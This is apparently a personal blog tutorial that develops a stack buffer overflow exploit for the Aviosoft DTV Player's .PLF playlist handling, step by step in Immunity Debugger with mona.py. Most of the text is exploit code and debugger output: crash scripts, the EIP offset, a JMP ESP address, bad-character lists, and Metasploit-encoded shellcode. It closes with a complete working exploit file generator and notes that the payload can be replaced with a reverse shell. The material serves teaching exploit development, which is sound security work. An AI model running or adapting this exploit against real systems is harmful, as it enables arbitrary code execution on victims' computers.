Exploit writing - Stack based Buffer overflow

There are many exploit writing tutorials. But the corelan's exploit writing tutorials are much much better. If you want to learn exploit development , of course you may get started with corelan too. Anyway,

Today i have tried to exploit an application , found at http://www.exploit-db.com/exploits/22932/ (The exploit script did not work for me). Exploiting the vulnerability was very easy but specifically finding the bad char was bit tricky. At least I was able to find all bad char using Corelan's mona.py and exploited the application successfully.  The following tools i used to develop the exploit:

1. Vmware workstation .

2. Python.

3. Immunity Debbugger .

4. Mona.py. (Copy mona.py to "C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands")

5. Windows XP3 and windows 7.

6. Metasploit.


If you are going to try/build this exploit yourself then you also need those above tools, So make sure to download them as your preparation.

i have downloaded the vulnerable application first and installed on windows xp3 vm.


                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating expoit."
f=open("crash-me.PLF","w") 
push="A" * 2000

try:   
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"


It will create a file "crash-me.PLF" . If i open the file in AviSoft DTV Player then it just crashes. Well, Let's Attach with Immunity Debugger to see what is happening.


Click on Debbug>>Run .



Now let's open the "crash-me.PLF" :



So its finally crashed and i saw esp and eip register contains "AAAAAAAA...." :



It clearly indicating that i control EIP which is mean the crash is really exploitable(Explaining later!).   Now it is time to find how many the stack requiring for getting overwritten EIP. So time to work with a great tool mona.py .  There was old odd way to do that but now we can do it using metasploit or mona.py very easily. We already know the application crashed since we sent 2000Bytes junk. So we will create a Cycling Patter using mona.

First i set default working folder for mona:

mona config -set workingfolder c:\mona\%p


Then Mona command is : 
!mona pattern_create 2000



 It just created a file in C:\mona\AviosoftDTV called "pattern.txt" . This time need to edit the script again and put the Cycling patter instead "A".  the full script will be look like this:

print "Creating expoit."
f=open("crash-me.PLF","w") 
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

try:   
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Replacing "A"*2000 with following pattern generated by mona


Now need to regenerate the "crash-me.PLF" file and open with AviSoft DTV(Already attached with debugger) . So the application crashed again but  with mona's Cycling pattern instead "AAAAAA..." . So i need to take note of EIP value. In my case it is "37694136" :




This time we need to figure out the exact bytes to overwrite EIP . For this mona is enough :

!mona pattern_offset 37694136






 It tells that we need 260 bytes to overwrite stack and more 4 bytes we will need to overwrite EIP. So it is 260+4=264 bytes


Let's modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260        #Found by mona.py 
eip ="BBBB"         #more 4 bytes to overwrite EIP
junk="C"*1736       #Later will replace this with real shellcode 

try:   
    f.write(push+eip+junk)       
    f.close()
    print "File created"
except:
    print "File cannot be created"

In the script i have replaced Cycling patter with 260 bytes "A" and more 4 bytes to overwrite EIP with "BBBB" then 1736 bytes (2000-264). If first junk(260 bytes) length is okay then EIP will be "BBBB". Let's try:



See EIP is 42424242=BBBB and ESP(Stack Pointer) is contains CCCC.. But here i see another problem that after EIP  some "CCCC":

0012EB5C   42424242  BBBB
0012EB60   43434343  CCCC
0012EB64   43434343  CCCC
0012EB68   43434343  CCCC
0012EB6C   43434343  CCCC



We really need to jump over these nasty junk. See later on. Anyway, We see we are controlling EIP. Because there are  "BBBB".

Our Next goal will be:

1. Replacing "BBBB" with valid pointer(Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC... after EIP) easy problem.
3. Replacing "CCCCCC..." with real shellcode.


                                                                   FIND EIP
Let's find EIP address. EIP address can be found in application or OS dll. For reliability we should always try to use Application's dll if possible. So In this application i am going to find the EIP from application's dll. Again i will use use mona(mona is very powerful and i know what i am doing.) . So the command should be:

!mona jmp -r esp -o




It will create a file called "jmp.txt" in "C:\mona\AviosoftDTV" and there will be following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034c4db : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034d9cb : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x6034dc73 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\Configuration.dll)
0x640614e3 : jmp esp |  {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x640627a3 : jmp esp |  {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll)
0x64119bc3 : jmp esp |  {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)
0x6411a7ab : jmp esp |  {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\NetReg.dll)




Here i will use 0x6411a7ab. Before that for learning purpose let's find this address manually using Immunity Debugger itself(First we need to trigger the crashed otherwise all dll won't load properly):

1. Immunity Debugger menu : View>> View Executable Modules .
2. Find the "NetReg.dll" and double click on it:
3. Our goal is finding "JMP ESP" . 
4. Right click on the window and Search For>> All Commands>>




5. Now another window will pop up and search for "jmp esp"


I was keeping searching until found the 0x6411a7ab.



                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let's get back to real work. We need to modify the script put the address in EIP variable instead "BBBB". We should remember that windows is little endian , means we need reverse the address so EIP should be "0x6411a7ab=\xab\xa7\x11\x64". Here is the modified script:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260        #Found by mona.py 
eip ="\xab\xa7\x11\x64"         #EIP
junk="C"*1500       #Later will replace this with real shellcode 

try:   
    f.write(push+eip+junk)      
    f.close()
    print "File created"
except:
    print "File cannot be created"



Let's run the application through Debugger and it should now have the exact address i have set. Time to make the application execute the shellcode. So i am modifying the script again to make it more safe:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260     #Found by mona.py, "A" Replaced with nops 
eip ="\xab\xa7\x11\x64"         #EIP
junk="\x90"*500     #More nops before reach to shellcode 
shellcode="D"*1000     #Will replace with shellcode.
try:   
    f.write(push+eip+junk+shellcode)        
    f.close()
    print "File created"
except:
    print "File cannot be created"


What i did on above script is just replaced all "A" with nops. Nops mean do nothing but pass to next instruction(Not a good idea?). Recently i mentioned that after EIP we see some unnecessary "CCCCCC..."  which will completely break our exploit. Putting enough nops will solve this problem too. Before going to next step let's test it if it is working as i expected.

1. Setting breakpoint at EIP address 0x6411a7ab to make sure that our exploit is reaching to right address. To do that we need to following :

Right click>>Go to >>Expression



2. When new window will pop up , search the eip address,  You may need to search it twice. If found the address then we will see like this:




3. Now press F2. It may warn you about breakpointing to this address but you can ignore the warning. Well, Now i am going to open it(Attached with debugger). It hits the breakpoint and i can see now i am landing to nops directly:



So it worked!


Let's put real shellcode instead "D". It is time to use metasploit to generate windows/exec shellcode to execute calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "\x00\x0a" -t c




I tried to avoid the normal bad char "\x00\x0a". And Metasploit  generated following shellcode:

 
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] = 
"\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c"






Anyway, Let's modify the script again:


print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260     #Found by mona.py 
eip ="\xab\xa7\x11\x64"         #EIP
junk="\x90"*500     #500 nops before real shellcode
shellcode=("\xbe\x28\xc7\x1b\x1f\xd9\xed\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x32\x31\x70\x12\x83\xe8\xfc\x03\x58\xc9\xf9\xea\x64\x3d\x74"
"\x14\x94\xbe\xe7\x9c\x71\x8f\x35\xfa\xf2\xa2\x89\x88\x56\x4f"
"\x61\xdc\x42\xc4\x07\xc9\x65\x6d\xad\x2f\x48\x6e\x03\xf0\x06"
"\xac\x05\x8c\x54\xe1\xe5\xad\x97\xf4\xe4\xea\xc5\xf7\xb5\xa3"
"\x82\xaa\x29\xc7\xd6\x76\x4b\x07\x5d\xc6\x33\x22\xa1\xb3\x89"
"\x2d\xf1\x6c\x85\x66\xe9\x07\xc1\x56\x08\xcb\x11\xaa\x43\x60"
"\xe1\x58\x52\xa0\x3b\xa0\x65\x8c\x90\x9f\x4a\x01\xe8\xd8\x6c"
"\xfa\x9f\x12\x8f\x87\xa7\xe0\xf2\x53\x2d\xf5\x54\x17\x95\xdd"
"\x65\xf4\x40\x95\x69\xb1\x07\xf1\x6d\x44\xcb\x89\x89\xcd\xea"
"\x5d\x18\x95\xc8\x79\x41\x4d\x70\xdb\x2f\x20\x8d\x3b\x97\x9d"
"\x2b\x37\x35\xc9\x4a\x1a\x53\x0c\xde\x20\x1a\x0e\xe0\x2a\x0c")
shellcode+="\x90"*900  #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:   
    f.write(all)        
    f.close()
    print "File created"
except:
    print "File cannot be created"




Well, ReGenerate the "crash-me.PLF" file and opening with the attached avisoft dtv but unfortunately it just crashed....


It does not even land to nops(wtf!). Seems it is happening for bad char, some code has been truncated. But no problem we can find the bad char using mona and this was my new knowledge today learning to use mona to find bad char easily. bad chars can corrupt, truncate our shellcode. If there is any bad chars then our exploits won't work!


So instead spending much time i am going to use mona to find the bad chars(This will be good idea).I am using the first crash PoC again. Let's see how i did it.
                                                    

                                                      FINDING BAD CHARS
First command:
!mona bytearray -b "\x00"

"\x00" is common bad char so i used it to generate all bytecode using mona.

Mona created two file in C:\mona\AviosoftDTV , 1. bytearray.txt 2. bytearray.bin . bytearray.bin is binary which will need later for comparing.


Well, in bytearray.txt are following contents :




Modify the script and put the generated output to the script right after  variable push="A"*2000 :

print "Creating expoit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000       #Found by mona.py
push+=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 


try:   
    f.write(push)       
    f.close()
    print "File created"
except:
    print "File cannot be created"



Now generate the file "badchar.PLF". Attach the application with debugger, run, open "badchar.PLF" and use another mona command is :

!mona compare -f C:\mona\AviosoftDTV\bytearray.bin



It will create another file called "compare.txt" when we will see like this:




open "compare.txt" in notepad and search for "stack"(http://pastebin.com/YLCnyne7) and after scrolling down a little bit i can see :

                | File           | Memory         | Note       
---------------------------------------------------------------
0   0   9   9   | 01 ... 09      | 01 ... 09      | unmodified!
---------------------------------------------------------------
9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded   
108 109 1   1   | 6d             | 6d             | unmodified!
109 110 5   5   | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted  
114 115 1   1   | 73             | 73             | unmodified!
115 116 2   2   | 74 75          | 5c 41          | corrupted  
117 118 1   1   | 76             | 76             | unmodified!
118 119 137 137 | 77 ... ff      | 69 ... 00      | corrupted  

Possibly bad chars: 0a
Bytes omitted from input: 00




It is comparing data's file and memory. If there is no bad char then File and Memory data will be same. See above the first line:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggesting that the bad char may be "0a" because "0a" from file does not match to memory ... is it?



So this time again we need to generate bytearray:

!mona bytearray -b "\x00\x0a"

Now we again need to compare with bytearray(See above, it is same).... Just keep doing it until i found all bad chars.

                             



                                              EXECUTE SHELLCODE
By mona i found the bad chars are "\x00\xff\x0a\0x0d\x1a" . After found these bad chars i regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\0x0d\x1a\xff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] = 
"\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79";




Well, Let's modify the script again,change the shellcode. The Final reliable working exploit is:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260     #Found by mona.py 
eip ="\xab\xa7\x11\x64"         #EIP
junk="\x90"*500     #500 nops before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\0x0d\x1a\xff" -t c
shellcode=("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
shellcode+="\x90"*900  #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:   
    f.write(all)        
    f.close()
    print "File created"
except:
    print "File cannot be created"



After regenerating the "crash-me.PLF" open in AviSoft DTV and it will execute calc.exe. I did it in debugger with pressing F9:



Anytime We can change the windows/exec shellcode to reverse shellcode which will connect to my specified IP address with command shell. 



The same exploit will work on windows 7 too :

Because i used EIP address from the application itself. If i would use the EIP from OS dll then of course the exploit won't work(The advantage of application's dll).


This is it!



Note: Exploit writing is much more about research. Without researching it is not possible to be an exploit writer . If you have questions,advices, please comment here or mail me and i will try to answer(Love to discuss!).

If you want to learn more about exploit development(In details) , read corelan's tutorial https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/.Much better than other commercial training :).






5 comments:

  1. quick hint - you can run !mona findmsp to automate certain tasks; or even !mona suggest -cpb '\x00\xff\x0a\0x0d\x1a\xff' to build the entire exploit for you (metasploit module).

    ReplyDelete
    Replies
    1. mona actually can do lots of things which make exploit development lots easier. But i wanted to do it a bit manually :)

      Thanks for the hint!

      Delete
  2. the best (y) respect admin (y)

    ReplyDelete
  3. Quality read!
    Nice job :)

    ReplyDelete